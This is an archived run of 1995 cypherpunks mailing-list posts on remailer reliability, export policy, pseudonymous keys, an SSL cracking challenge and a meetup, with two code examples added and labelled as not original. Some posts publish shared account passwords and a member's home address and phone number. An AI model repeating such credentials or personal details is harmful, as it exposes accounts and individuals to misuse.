: "Particularly in Europe, there are grave concerns about
: security issues," he said. "As a result, they do conduct
: various security programs regularly. This was part of a
: routine check of their own security systems.

: "The bag got away from them basically," he said.


Airport police was very quick to point out that such practices
were legal, now when they do that ......

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 21 Aug 95 06:51:22 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508211350.GAA04171@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 21 Aug 95 6:00:07 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         +-------+--+  2:37:07  99.99%
portal   hfinney@shell.portal.com         #.-*#***##*#    20:53  99.99%
replay   remailer@replay.com              *****++**+**    11:22  99.99%
alumni   hal@alumni.caltech.edu           *.-*#*******    26:11  99.99%
crown    mixmaster@kether.alias.net       ------------  2:20:01  99.99%
hacktic  remailer@utopia.hacktic.nl       *****++**+**    12:14  99.99%
hroller  hroller@c2.org                   -##*-***##**    11:48  99.93%
syrinx   syrinx@c2.org                    -----------   2:02:23  99.92%
mix      mixmaster@remail.obscura.com     -++------..   9:59:29  99.91%
c2       remail@c2.org                    -++++++++++     47:13  99.90%
flame    remailer@flame.alias.net         ++++++++++++    55:03  99.83%
ideath   remailer@ideath.goldenbear.com   -.-..----.-   5:50:27  99.75%
vox      remail@vox.xs4all.nl             .---------   12:10:38  99.99%
ford     remailer@bi-node.zerberus.de     **#***-****#     5:54  99.42%
bsu-cs   nowhere@bsu-cs.bsu.edu           ###*#_.-##+#  3:53:51  99.20%
vishnu   mixmaster@vishnu.alias.net       -- --- ----   3:01:49  99.07%
gondolin mixmaster@gondolin.org           *--*-* **+      31:07  98.87%
rmadillo remailer@armadillo.com           **__.++++++*  3:57:22  98.33%
extropia remail@extropia.wimsey.com       .   .--._.-  16:59:51  95.74%
penet    anon@anon.penet.fi               +++*---- -++  4:27:59  90.66%
rahul    homer@rahul.net                  ##**#***#*+#     6:58  99.99%
rebma    remailer@rebma.mn.org            -             9:53:43  10.67%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
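
A parser for the listing format shown in the message above, as an added
example that is not part of the original post and is not premail's code. The
sample lines are copied from the listing; the function names and the
selection thresholds are assumptions.

```python
import re

# Sample lines copied from the listing above (a subset, to keep this short).
CONFIG = '''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
catalyst@netcom.com is _not_ a remailer.
'''

STATS = '''
vox      remail@vox.xs4all.nl             .---------   12:10:38  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ###*#_.-##+#  3:53:51  99.20%
rebma    remailer@rebma.mn.org            -             9:53:43  10.67%
c2       remail@c2.org                    -++++++++++     47:13  99.90%
flame    remailer@flame.alias.net         ++++++++++++    55:03  99.83%
vishnu   mixmaster@vishnu.alias.net       -- --- ----   3:01:49  99.07%
'''

ENTRY = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')


def parse_config(text):
    """Parse the $remailer{...} lines into {name: {address, flags, pgp_key_id}}."""
    remailers = {}
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue  # blank lines and the "is _not_ a remailer" notes
        name, address, flags = m.group(1), m.group(2), m.group(3).split()
        # "pgp." means the short name, not the address, is the PGP key ID.
        key_id = name if "pgp." in flags else address if "pgp" in flags else None
        remailers[name] = {
            "address": address,
            "flags": {f.rstrip(".") for f in flags},
            "pgp_key_id": key_id,
        }
    return remailers


def to_seconds(latency):
    """Convert 'h:mm:ss' or 'mm:ss' to seconds."""
    seconds = 0
    for field in latency.split(":"):
        seconds = seconds * 60 + int(field)
    return seconds


def parse_stats(text, remailers):
    """Attach latency and uptime from the ping table to parsed remailers."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in remailers or not parts[-1].endswith("%"):
            continue
        # The history column can contain spaces, so read from the right.
        remailers[parts[0]]["latency_s"] = to_seconds(parts[-2])
        remailers[parts[0]]["uptime"] = float(parts[-1].rstrip("%"))
    return remailers


def pick(remailers, required, min_uptime):
    """Names with all required flags and enough uptime, fastest first."""
    ok = [n for n, r in remailers.items()
          if required <= r["flags"] and r.get("uptime", 0.0) >= min_uptime]
    return sorted(ok, key=lambda n: remailers[n].get("latency_s", float("inf")))


if __name__ == "__main__":
    table = parse_stats(STATS, parse_config(CONFIG))
    for name in pick(table, {"pgp", "reord"}, 99.0):
        r = table[name]
        print(name, r["address"], "key:", r["pgp_key_id"], r["latency_s"], "s")
```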




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 20 Aug 95 22:40:19 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary passwordRe: RealAudio website temporary password
Message-ID: <199508210540.HAA04886@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Cypherpunks RealAudio free account is now activated with password
"writecode" (case sensitive -- make them letters small).

The user name is still "cypherpu".  RealAudio.com does not truncate names
longer than 8 characters during login (meaning "cypherpunks" fails), but
their signup page won't allow entry of more than 8.  Silly.

Don't have too much fun listening to NPR, now...


> Date: Sun, 20 Aug 1995 21:49:23 -0700
> From: RealAudio Welcome Wagon <welcome@realaudio.com>
> To: cypherpunks@toad.com
> Reply-To: welcome@realaudio.com
> Subject: RealAudio website temporary password
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
>
> This is an automatic response to your request for a free user account
> on the RealAudio site. Welcome to the world of RealAudio.
>
> The following temporary password will only be used once,
> in order to activate the username and password you
> selected for yourself during signup.
> To activate your account, please visit our Account Activation page
> at http://www.RealAudio.com/welcome.html
> and enter the temporary password in the proper blank.
>
> The user name you selected is:
>
> cypherpu
>
> Your temporary RealAudio password is:
>
> Toledo.Francisco
>
> If you have trouble with the software, please refer to
>  the RealAudio FAQ and Technical Notes available at
>  http://www.RealAudio.com/help.html
>
> You can also contact us through http://www.RealAudio.com/comment.html
>
> Thank you for becoming a RealAudio user.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 21 Aug 95 04:53:31 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <v02120d02ac5e1e6c3b53@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 8/20/95, Timothy C. May wrote:
>And it is, as those cases were, but predicting the imminent
>collapse of American civilization is usually a lose.

One of my favorite quotes is supposed to be from Gibbon's _Decline and Fall
of the Roman Empire_ .  If I write a book about this stuff, it'll go right
on the frontispiece. Something like:

"It is quite attractive to posit the end of the world in one's analysis of
current affairs, but historically, it hasn't proven to be correct."

BTW, I've been looking for the exact quote for about 6 months, without
having reread the whole damn book.  If anyone who has actually *seen* an
on-line copy of Gibbon would send me a pointer to it, I would be much
obliged. I have looked in all the usual places (Gutenberg, etc.) to no
avail...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 20 Aug 95 23:00:15 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary passwordRe: RealAudio website temporary password
Message-ID: <199508210600.IAA05113@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
>>This is an automatic response to your request for a free user account
>>on the RealAudio site. Welcome to the world of RealAudio.
>> ...
>>The user name you selected is:
>>
>>cypherpu
>
>The password has been changed to "cypherpunks"
>

Oops.  Thank you for changing the password.  Shall we not use writecode
unless the site does not allow "cypherpunks" as the password?  I get it
now.

Crypto relevance:

    http://www.realaudio.com/rafiles/npr/password/nb081801-4.ram

The segment is overly optimistically billed as:

"Dan Charles reports the Clinton administration has reached a compromise
with the security industry about the export of encryption equipment that
will protect personal computer files and allow law enforcement agencies
access to them if necessary. (3:30)"








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Mon, 21 Aug 95 07:04:41 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
In-Reply-To: <ac5d49b804021004ff37@[205.199.118.202]>
Message-ID: <8kC8vdaSMUw8I0axsN@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> The U.S. is not likely to find itself relegated to third world status over
> this issue. Rhetorically, I wish it were so, but it just ain't. This
> issue--like the McCarthy hearings in the 1950s, the race issue in the '60s,
> the Vietnam war in the '60s and '70s, to name a few cases, _sounds_ really
> serious. And it is, as those cases were, but predicting the imminent
> collapse of American civilization is usually a lose.

In all those cases, the critics were right.  You just think "imminent"
means "in the next year or two".  Look at the signs, man --
literacy and child mortality rates, an imprisoned populace, massive 
government debt, etc.  The US is slipping into the second world as we
speak, with no signs of a turnaround ahead.  Only the sheer size of
the economy keeps people from believing it.  The critics _were_ right.
(Incidentally, the race issue certainly spans more than a mere
decade. The race-related violent demonstrations certainly peaked in
the 60s, but the deleterious effects of forced immigration and slavery
have been a blight on society every day for almost three centuries.) 

Go right ahead, fed, ban strong crypto.  The coffin only needs a few
more nails.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 21 Aug 95 07:13:23 PDT
To: rsalz@osf.org
Subject: Re: Export policy change
In-Reply-To: <199508181846.LAA12609@comsec.com>
Message-ID: <9508211409.AA26815@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Rich Salz <rsalz@osf.org>
>Date: Thu, 17 Aug 1995 23:48:01 -0400

>The
>reporter (Dan Charles?) said something like anyone can hold the keys,
>as long as they will be made avail when presented with a court order.
>He also said, US citizens will still be able to use strong crypto
>without key escrow internally.

The real question is whether manufacturers will bother producing multiple
versions -- one domestic, one foreign.

There's room for cypherpunks yet -- not only writing crypto applications
but also generating emergency-access systems (e.g., for PGP) which meet our
needs.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 21 Aug 95 07:13:21 PDT
To: Marcel van der Peijl <bigmac@digicash.com>
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210927.LAA20988@digicash.com>
Message-ID: <199508211411.KAA02016@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure this has much to do with crypto any more...

.pm

Marcel van der Peijl writes:
> My $0.02 on the 'strict security' on Schiphol (first one to cash in 
> gets it) based upon personal experience:
> 
> American airlines (Northwest, United) have very strict security when 
> departing from Schiphol. Interviews, men with rifles, queries on who 
> packed your luggage, etc. But all the crap I drag around (200+ kilos of 
> exhibition equipment full of custom built hardware, large batteries, 
> transformers etc) has never been opened.
> 
> However, you should try flying a different airline: KLM, Lufthansa, etc.
> No interviews, no guns, just friendly people.
> 
> // Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
> // The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 21 Aug 95 07:22:30 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <9508211422.AA13099@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> We all read the stories. "Infant stolen from crib in Hospital", "Thousands
> of children abducted every year". Many parents would jump at anything
> that might increase the chance of recovering their children should they be
> abducted. Just take a look at lines during "Child Fingerprint Days" at your
> local mall.
> The transponders also provide ID for the ATMs and credit card terminals of
> the future. No criminal can loot your account. You can leave the ATM card
> at home. How convenient! 

    This is one place where the nutty end of the religious right can 
actually help preserve liberties - the proposal is so close to the 
'mark of the Beast'  in Revelations that they can be counted on to oppose
it to their dying breaths.



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 21 Aug 95 07:49:15 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508182054.NAA16103@comsec.com>
Message-ID: <9508211437.AA29550@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 18 Aug 1995 14:47:55 -0400 (EDT)
>From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>

>You have decided to allow the private CAs to issue certificates of varying
>degrees of corroboration so long as the degree of verification used is
>deducible from the certificate.  E.g. a certificate might say "we check
>the passport"; or "we check driver's license" or "we took blood, hair,
>fingerprint, retinal scan and first-born child".  It might even say "we
>checked nothing".  You have also decided that a CA may issue a certificate
>in the name of a pseudonym, so long as the CA retains information about
>the True Name.  Now the issue arises as to whether one should allow the CA
>to issue certificates to pseudonyms where it has *no record* of the real
>identity of the person proffering the key pair. 
>
>Is there any reason why a person would want such a certificate?  

I see several reasons, but I don't see a reason for a CA in this case.  The
key being signed can serve in place of the CA's key.  That is, the key can
be self-signed.  All that needs to be proved in this case is that someone
owns the private key which goes with the public key.

As for what good that key is --

Prior to our meeting in person this year, all you knew about me was by my
postings.  If I had signed all of them with the same self-signed key, then
you would know that all of those postings came from one "person" (the set
of people, presumably only one person, with access to the private key).
The postings define the person, in your mind, and you are absolutely
certain that they came from that person (defined as I did above).  You
don't need any further certification to attest to that fact.

No economic impact, you say?

My postings could have been S/W.  You could have tried my S/W and liked it
-- hiring me to do work for you privately.  In all this process, we need
never meet.  If we don't meet, it doesn't matter what my blood type is or
if I have a driver's license or a passport.  I could even be a small,
silver-skinned alien who is perpetually in hiding.

No money transfer, you say?

Wells Fargo bank (an innovator) could initiate public-key bank accounts.  I
would open the account by sending them a self-signed public key.  They
would use that key as my bank account number.  Anyone would be allowed to
deposit money into that account (e.g., using CyberCash transfers).  Only I,
the person holding the private key, would be permitted to transfer funds
out.

Again, in the Internet, nobody knows you're a dog-faced alien sea creature.

 - Carl
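
The public-key bank account and the single-key attribution of postings described in the message above, as an added example that is not part of the original post or of any real bank's system. Ed25519 from Go's standard library stands in for the keys of the period; the `Nym` and `Bank` types, the tag strings and the per-account sequence counter (replay protection the message does not mention) are assumptions made here.

```go
package main

import (
	"crypto/ed25519"
	"encoding/hex"
	"errors"
	"fmt"
)

// Domain-separation tags (constructed for this example) stop a signature
// made for one purpose from being accepted for another.
const TagSelf, TagPost, TagDraw = "nym-self-v1:", "nym-post-v1:", "nym-withdraw-v1:"

// Nym is a pseudonym defined only by its key pair; no True Name is recorded.
type Nym struct {
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

func NewNym() *Nym {
	pub, priv, err := ed25519.GenerateKey(nil) // nil selects crypto/rand
	if err != nil {
		panic(err)
	}
	return &Nym{Pub: pub, priv: priv}
}

// ID is the hex-encoded public key: the nym's only name and its account number.
func (n *Nym) ID() string { return hex.EncodeToString(n.Pub) }

func (n *Nym) Sign(tag, msg string) []byte { return ed25519.Sign(n.priv, []byte(tag+msg)) }

// Verify reports whether sig over tag+msg was made by the holder of id's
// private key. With TagPost that is all a reader needs to attribute postings.
func Verify(id, tag, msg string, sig []byte) bool {
	pub, err := hex.DecodeString(id)
	return err == nil && len(pub) == ed25519.PublicKeySize && // other lengths panic
		ed25519.Verify(pub, []byte(tag+msg), sig)
}

type account struct{ balance, nextSeq uint64 }

// Bank keys each account by the owner's public key and knows nothing else.
type Bank struct{ accounts map[string]*account }

func NewBank() *Bank { return &Bank{accounts: map[string]*account{}} }

// Open accepts a self-signed key: possession of the private key is all it proves.
func (b *Bank) Open(id string, selfSig []byte) error {
	if !Verify(id, TagSelf, id, selfSig) {
		return errors.New("self-signature does not verify")
	}
	if b.accounts[id] == nil {
		b.accounts[id] = &account{}
	}
	return nil
}

// Deposit needs no authentication: anyone may pay into any account.
func (b *Bank) Deposit(id string, amount uint64) error {
	if b.accounts[id] == nil {
		return errors.New("no such account")
	}
	b.accounts[id].balance += amount
	return nil
}

// Order is the text a withdrawal signature covers: account, amount, counter.
func Order(id string, amount, seq uint64) string {
	return fmt.Sprintf("%s:%d:%d", id, amount, seq)
}

// Withdraw pays out only on an order signed by the account key. The counter
// makes a captured order useless the second time it is presented.
func (b *Bank) Withdraw(id string, amount, seq uint64, sig []byte) (uint64, error) {
	a := b.accounts[id]
	switch {
	case a == nil:
		return 0, errors.New("no such account")
	case !Verify(id, TagDraw, Order(id, amount, seq), sig):
		return a.balance, errors.New("bad signature")
	case seq != a.nextSeq:
		return a.balance, errors.New("replayed or out-of-sequence order")
	case amount > a.balance:
		return a.balance, errors.New("insufficient funds")
	}
	a.balance -= amount
	a.nextSeq++
	return a.balance, nil
}

func main() {
	nym, bank := NewNym(), NewBank()
	id := nym.ID()
	fmt.Println(bank.Open(id, nym.Sign(TagSelf, id)), bank.Deposit(id, 100))
	order := nym.Sign(TagDraw, Order(id, 40, 0))
	fmt.Println(bank.Withdraw(id, 40, 0, order)) // signed order is paid
	fmt.Println(bank.Withdraw(id, 40, 0, order)) // same order again is refused
}
```

The bank never learns who holds the key, yet a deposit slip, a stolen copy of an old order, or a signature from any other key cannot move funds out.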





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 11:19:02 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz meeting/party, Saturday, 26 August
Message-ID: <ac5e0f44040210042333@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is the last announcement I'll make here on the general Cypherpunks
list for this meeting/party at my house. I keep a mailing list for
interested folks, with about 35-40 names on it (not all of them local to
Santa Cruz and Monterey, needless to say). To be added, send me mail...no
special format, as I keep the list manually in Eudora Pro.

Here are just a few details.

WHAT: Cypherpunks Santa Cruz meeting/party. A chance for locals to meet,
and for others who want to vary their routine to visit this area.

WHEN: Saturday, August 26th, 1995, beginning at around 6 p.m., but early
arrivers can arrive as early as 5 (some are travelling from afar, so...).
Several people plan to stay over until Sunday.

WHERE: Tim May's house in Corralitos, between Aptos and Watsonville. 427
Allan Lane, 408-728-0152. Detailed directions available from the full
announcement.

WHO: Anybody who wants to attend. It will be both a meeting and a party, so
children and SOs may find it boring--you have been warned. Some local
people interested in crypto or related issues are on this list, even if
they're not subscribers to the Cypherpunks main list.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Mon, 21 Aug 95 11:09:35 PDT
To: "cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508211807.LAA01619@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

James and cpunx,

>At 11:45 AM 8/19/95 -0400, John Young wrote:
>>Fourth Foresight Conference on Molecular Nanotechnology
>And what does this have to do with cryptography?

Doesn't quantum coherence require molecular precision if it
is to work on 1024 bit PGP keys? If it works, such keys can 
be instantly factorized. It would be nice to follow that progress.

If human engineered molecular nano works, we'll have much 
more than PGP to worry about. Copies of copies of 
replicating disassemblers could rip the Earth apart in three
days, assuming doubling every 20 minutes like bacteria,
but not limited to proteins.

That would have a big impact on digital cash networks!

Kent
--
"Put pages for your business on the World Wide Web, just $5 per month!"
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Mon, 21 Aug 95 08:23:36 PDT
To: aba@exe.ex.ac.uk
Subject: Re: NEXT CHALLENGE...
In-Reply-To: <9508211354.AA12454@toad.com>
Message-ID: <199508211516.LAA08870@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon Aug 21 09:26:50 1995: you scribbled...
> 
> -------------------------------------8<-------------------------------------
> # SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
> # posted to Cypherpunks on 19 August 1995. 
> #
> # file checksum (ignoring # comments and whitespace) is 2977
> 
> CLEAR-MASTER     fbc009916010a6153f8f36
> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
> SERVER-VERIFY    006599b6d2f2a736
> -------------------------------------8<-------------------------------------

I've checked these numbers and I got the same answers.

Anyone who feels up to it can check the page

	http://petrified.cic.net/~altitude/ssl/ssl.challenge.2.long

> The keyserver will not be doling yet but please pickup the software
> ready to start.

Just a question, what's the purpose of this challenge?  If it's to do it
as fast as we can, then what about the person who already posted to the 
list saying that they were starting (with keys a000 -> afff).  

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Mon, 21 Aug 95 02:27:52 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210220.EAA03190@utopia.hacktic.nl>
Message-ID: <199508210927.LAA20988@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


My $0.02 on the 'strict security' on Schiphol (first one to cash in 
gets it) based upon personal experience:

American airlines (Northwest, United) have very strict security when 
departing from Schiphol. Interviews, men with rifles, queries on who 
packed your luggage, etc. But all the crap I drag around (200+ kilos of 
exhibition equipment full of custom built hardware, large batteries, 
transformers etc) has never been opened.

However, you should try flying a different airline: KLM, Lufthansa, etc.
No interviews, no guns, just friendly people.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sun, 20 Aug 95 19:31:56 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: NSA into antigravity?
In-Reply-To: <v01510101ac5d1e46d09f@[193.74.217.8]>
Message-ID: <199508210055.AA27598@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>>Neither the University nor the NSA has commented on the incident. However,
>>>it is believed that Ollman and Wayne were investigating a slight anomaly
>>>in the Earth's gravitational field centered around Fort Meade. No reason has
>>>been given for their detention.

The anomaly is just the NSA basements full of buzzing machines emitting all
that RFI and putting the Earth off tilt by .004 degrees a year. The nukes
actually home in on the emitted radiation like a heat seeking missile.

:)
Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Aug 95 09:31:07 PDT
To: cypherpunks@toad.com
Subject: ENE_mah
Message-ID: <199508211622.MAA03823@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-21-95. NYPaper:


   "C.I.A. Re-examines Hiring Of Ex-Terrorist as Agent: Agency
   Has Misgivings About Some on Payroll."

      As the Central Intelligence Agency cleans house after
      the cold war, trimming its roster of foreign agents and
      writing new rules for hiring them, a retired terrorist
      who was until recently on the agency's payroll has given
      it cause for some soul-searching. The case is a classic
      example of the dilemma the C.I.A. continually faces in
      recruiting foreign agents. The intelligence agency
      struggles to balance the demand to obtain information
      with its desire to keep its own hands clean, though it
      frames the issue in terms of national security, not
      morality. The C.I.A. will draw on the experience of the
      Federal Bureau of Investigation and the Drug Enforcement
      Administration in dealing with informants in the future.
      That is a break from the past; the agency has long
      considered law enforcement procedures an enema.


   ENE_mah











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 21 Aug 95 09:56:20 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <9508211648.AA17528@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> The US is slipping into the second world as we
